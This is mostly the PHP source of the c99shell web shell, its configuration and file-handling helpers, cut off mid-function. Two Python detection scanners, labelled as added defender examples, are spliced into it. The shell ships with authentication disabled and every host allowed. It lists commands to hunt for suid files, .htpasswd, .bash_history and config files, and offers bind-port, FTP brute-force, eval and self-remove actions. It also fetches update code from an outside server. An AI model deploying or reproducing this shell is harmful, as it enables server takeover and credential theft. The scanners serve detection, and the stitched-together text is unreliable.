This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
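A defender-side check built from the behaviours summarised above (request parameters merged into globals, silenced runtime-limit calls, and c99shell's own cookie and variable names). This is an added example, not part of the uploaded document; the indicator weights, the threshold and the three sample snippets are constructed for illustration.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    name: str
    weight: int          # constructed weight, tune against your own code base
    pattern: re.Pattern


INDICATORS = [
    # foreach over a request superglobal that assigns into variable-variables
    # ($$k = $v): a hand-rolled register_globals, rare in legitimate code.
    Indicator("request-to-globals import", 4, re.compile(
        r"foreach\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s+as\s+\$(\w+)\s*=>\s*\$(\w+)\s*\)"
        r".{0,80}?\$\$\1\s*=\s*\$\2", re.S)),
    # Overwriting $_REQUEST so cookies, GET and POST are all accepted as input.
    Indicator("$_REQUEST rebuilt from cookie/get/post", 2, re.compile(
        r"\$_REQUEST\s*=\s*array_merge\s*\(", re.I)),
    # Error-suppressed removal of the execution time limit.
    Indicator("silenced set_time_limit(0)", 1, re.compile(
        r"@\s*set_time_limit\s*\(\s*0\s*\)", re.I)),
    # Error-suppressed request to keep running after the client disconnects.
    Indicator("silenced ignore_user_abort", 1, re.compile(
        r"@\s*ignore_user_abort\s*\(\s*(?:true|1)\s*\)", re.I)),
    # Names that appear in the c99shell source on this page.
    Indicator("c99shell identifier", 5, re.compile(
        r"c99sh_(?:surl|updatefurl)|\$bindport_(?:pass|port)\b|\$cmdaliases\b")),
]


def scan(source: str, threshold: int = 5) -> dict:
    """Score PHP source text; each indicator counts once, at its first hit."""
    findings = []
    for ind in INDICATORS:
        match = ind.pattern.search(source)
        if match:
            line = source.count("\n", 0, match.start()) + 1
            findings.append((ind.name, ind.weight, line))
    score = sum(weight for _, weight, _ in findings)
    return {"score": score, "suspicious": score >= threshold, "findings": findings}


# Lines taken from the source listing on this page.
SHELL_EXCERPT = r"""<?php
@ignore_user_abort(true);
@set_time_limit(0);
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
"""

# Constructed sample: no c99 names at all, only the generic behaviour.
RENAMED_VARIANT = r"""<?php
@set_time_limit(0);
foreach ($_POST as $name => $val) { $$name = $val; }
"""

# Constructed benign sample: same functions, used the ordinary way.
BENIGN = r"""<?php
set_time_limit(0); // long-running export job
foreach ($_POST as $key => $value) { $clean[$key] = trim($value); }
"""

if __name__ == "__main__":
    for label, text in (("excerpt", SHELL_EXCERPT),
                        ("renamed", RENAMED_VARIANT),
                        ("benign", BENIGN)):
        result = scan(text)
        print(label, result["score"], result["suspicious"])
        for name, weight, line in result["findings"]:
            print(f"  line {line}: {name} (+{weight})")
```

Name-based indicators alone miss renamed copies, which is why the behavioural patterns carry enough weight to cross the threshold on their own.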
<?php
/*
******************************************************************************************************
*
* c99shell.php v.1.0 Shellci.Biz
* SheLL Arshive
* c99shell - www.shellci.biz
*
******************************************************************************************************
*/
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) =
explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function
strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if
(strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr =
stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 beta (21.05.2005)"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach
(explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name =
urldecode($v[0]); $value = urldecode($v[1]); foreach
(array("http://","https://","ssl://","ftp://","") as $needle) {if
(strpos($value,$needle) === 0) {$includestr .=
urlencode($name)."=".urlencode($value)."&";}}} if
($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 60; //limit of execution this script (seconds), 0 = unlimited.
//Authentication
$login = "c99"; //login
//DON'T FORGOT ABOUT CHANGE PASSWORD!!!
$pass = "c99"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
/*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/ $login = false; //turn off authentification
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href="http://ccteam.ru/releases/c99shell">c99shell v.".
$shver."</a>: access denied";
$autoupdate = false; //Automatic updating?
$updatenow = false; //If true, update now
$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
$filestealth = false; //if true, don't change modify&access-time
$donated_html = "<center><b>GaRDeNFoX</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start directory
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-type.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." %f%"=>array("php","php3","php4"),
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if true and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color="yellow">","</font>"), //
example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable is for disabling diskette errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
// Set as false or for turn off.
$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c99"; // default password for binding
$bindport_port = "11457"; // default port for binding
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name "config*""),
array("find config* files in current dir", "find . -type f -name "config*""),
array("find all writable directories and files", "find / -perm -2 -ls"),
array("find all writable directories and files in current dir", "find . -perm -2
-ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name
service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name
.bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name
.fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr
-va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = true; //Buffer-function
$copy_unset = false; //Remove copied files from buffer after pasting
//Quick launch
$quicklaunch = array(
array("<img src="".$surl."act=img&img=home" alt="Home" height="20"
width="20" border="0">",$surl),
array("<img src="".$surl."act=img&img=back" alt="Back" height="20"
width="20" border="0">","#" onclick="history.back(1)"),
array("<img src="".$surl."act=img&img=forward" alt="Forward" height="20"
width="20" border="0">","#" onclick="history.go(1)"),
array("<img src="".$surl."act=img&img=up" alt="UPDIR" height="20"
width="20" border="0">",$surl."act=ls&d=%upd&sort=%sort"),
array("<img src="".$surl."act=img&img=refresh" alt="Refresh" height="20"
width="17" border="0">",""),
array("<img src="".$surl."act=img&img=search" alt="Search" height="20"
width="20" border="0">",$surl."act=search&d=%d"),
array("<img src="".$surl."act=img&img=buffer" alt="Buffer" height="20"
width="20" border="0">",$surl."act=fsbuff&d=%d"),
array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
array("<b>Bind</b>",$surl."act=bind&d=%d"),
array("<b>Proc.</b>",$surl."act=ps_aux&d=%d"),
array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
array("<b>Sec.</b>",$surl."act=security&d=%d"),
array("<b>SQL</b>",$surl."act=sql&d=%d"),
array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
array("<b>Self remove</b>",$surl."act=selfremove"),
array("<b>Logout</b>","#" onclick="if (confirm('Are you sure?'))
window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);
//END CONFIGURATION
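A defender's use of the configuration above, as an added example that is not part of the original listing: a Python sweep that flags PHP files carrying identifiers visible on this page (the `c99shvars` cookie name, `$c99sh_updatefurl`, the `c99_*` helper names, `extract()` on `$_REQUEST`, `unserialize()` on `$_COOKIE`). The weights, the threshold and the function names `scan_text` and `scan_tree` are assumptions of this example.

```python
import os
import re

# Strings and constructs that appear in the listing on this page.
# The weights and the threshold are assumptions chosen for this example.
INDICATORS = [
    (re.compile(r"\bc99shvars\b"), 3, "c99 session cookie name"),
    (re.compile(r"\$c99sh_updatefurl\b"), 3, "c99 update-URL variable"),
    (re.compile(r"\bc99_(?:buff_prepare|sess_put)\s*\("), 3, "c99 helper function"),
    (re.compile(r"\$bindport_(?:pass|port)\b"), 2, "bind-port setting"),
    (re.compile(r"extract\s*\(\s*\$_REQUEST\b"), 2, "extract() on request data"),
    (re.compile(r"unserialize\s*\(\s*\$_COOKIE\b"), 2, "unserialize() on a cookie"),
    (re.compile(r"act=(?:selfremove|ftpquickbrute|bind|eval)\b"), 1, "shell action in URL"),
]
THRESHOLD = 5
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".inc")


def scan_text(text):
    """Return (score, labels) for one file's contents; each indicator counts once."""
    hits = [(weight, label) for rx, weight, label in INDICATORS if rx.search(text)]
    return sum(w for w, _ in hits), [label for _, label in hits]


def scan_tree(root):
    """Walk a web root; return [(path, score, labels)] for files at or above THRESHOLD."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                # latin-1 never fails to decode, so binary junk cannot abort the sweep
                with open(path, "r", encoding="latin-1") as fh:
                    score, labels = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip it and keep going
            if score >= THRESHOLD:
                findings.append((path, score, labels))
    return sorted(findings, key=lambda f: -f[1])


# Constructed samples: three config lines copied from this page, and a benign file.
SAMPLE_SHELL = ('$sess_cookie = "c99shvars";\n@extract($_REQUEST["c99shcook"]);\n'
                '$sess_data = unserialize($_COOKIE["$sess_cookie"]);\n')
SAMPLE_BENIGN = '<?php\n$config = parse_ini_file("app.ini");\necho $config["title"];\n'

if __name__ == "__main__":
    print(scan_text(SAMPLE_SHELL))
    print(scan_text(SAMPLE_BENIGN))
```

Renamed or obfuscated copies will not contain these literal strings, so a clean result from this sweep is not proof that a web root is clean.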
// / Next code isn't for editing /
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !
preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a
href="http://ccteam.ru/releases/cc99shell">c99shell</a>: Access Denied - your
host (".getenv("REMOTE_ADDR").") not allow");}
if ($login)
{
if(empty($md5_pass)) {$md5_pass = md5($pass);}
if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) !=
$md5_pass))
{
if ($login_txt === false) {$login_txt = "";}
elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>","
",$donated_html));}
header("WWW-Authenticate: Basic realm="c99shell ".$shver.": ".$login_txt.""");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}
if ($act != "img")
{
$lastdir = realpath(".");
chdir($curdir);
if (($selfwrite) or ($updatenow))
{
if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
c99sh_getupdate();
$data = file_get_contents($c99sh_updatefurl);
$fp = fopen($data,"w");
fwrite($fp,$data);
fclose($fp);
exit;
}
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
if (!function_exists("c99_buff_prepare"))
{
function c99_buff_prepare()
{
global $sess_data;
global $act;
foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] =
str_replace("",DIRECTORY_SEPARATOR,realpath($v));}
foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] =
str_replace("",DIRECTORY_SEPARATOR,realpath($v));}
$sess_data["copy"] = array_unique($sess_data["copy"]);
$sess_data["cut"] = array_unique($sess_data["cut"]);
sort($sess_data["copy"]);
sort($sess_data["cut"]);
if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"]
[$k] == $v) {unset($sess_data["copy"][$k]); }}}
else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v)
{unset($sess_data["cut"][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists("c99_sess_put"))
{
function c99_sess_put($data)
{
global $sess_cookie;
global $sess_data;
c99_buff_prepare();
$sess_data = $data;
$data = serialize($data);
setcookie($sess_cookie,$data);
}
}
if ($sort_save)
{
if (!empty($sort)) {setcookie("sort",$sort);}
if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
if (strlen($content) > $len)
{
$len = ceil($len/2) - 2;
return substr($content, 0, $len)."...".substr($content, -$len);
}
else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
if (!is_numeric($size)) {return false;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
}
if (!function_exists("fs_copy_dir"))
{
function fs_copy_dir($d,$t)
{
$d = str_replace("",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$h = opendir($d);
while (($o = readdir($h)) !== false)
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,
$t.DIRECTORY_SEPARATOR.$o);}
else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o);
fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
if (!$ret) {return $ret;}
}
}
closedir($h);
return true;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
$d = str_replace("",DIRECTORY_SEPARATOR,$d);
$t = str_replace("",DIRECTORY_SEPARATOR,$t);
if (!is_dir(dirname($t))) {mkdir(dirname($t));}
if (is_dir($d))
{
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_copy_dir($d,$t);
}
elseif (is_file($d)) {return copy($d,$t);}
else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
function fs_move_dir($d,$t)
{
$h = opendir($d);
if (!is_dir($t)) {mkdir($t);}
while (($o = readdir($h)) !== false)
{
if (($o != ".") and ($o != ".."))
{
$ret = true;
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,
$t.DIRECTORY_SEPARATOR.$o);}
else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and
fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
if (!$ret) {return $ret;}
}
}
closedir($h);
return true;
}
}
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
$d = str_replace("",DIRECTORY_SEPARATOR,$d);
$t = str_replace("",DIRECTORY_SEPARATOR,$t);
if (is_dir($d))
{
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_move_dir($d,$t);
}
elseif (is_file($d))
{
if(copy($d,$t)) {return unlink($d);}
else {unlink($t); return false;}
}
else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
$h = opendir($d);
while (($o = readdir($h)) !== false)
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.$o)) {unlink($d.$o);}
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
}
}
closedir($h);
rmdir($d);
return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
$o = str_replace("",DIRECTORY_SEPARATOR,$o);
if (is_dir($o))
{
if (substr($o,-1,1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
return fs_rmdir($o);
}
elseif (is_file($o)) {return unlink($o);}
else {return false;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
$result = "";
if (!empty($cmd))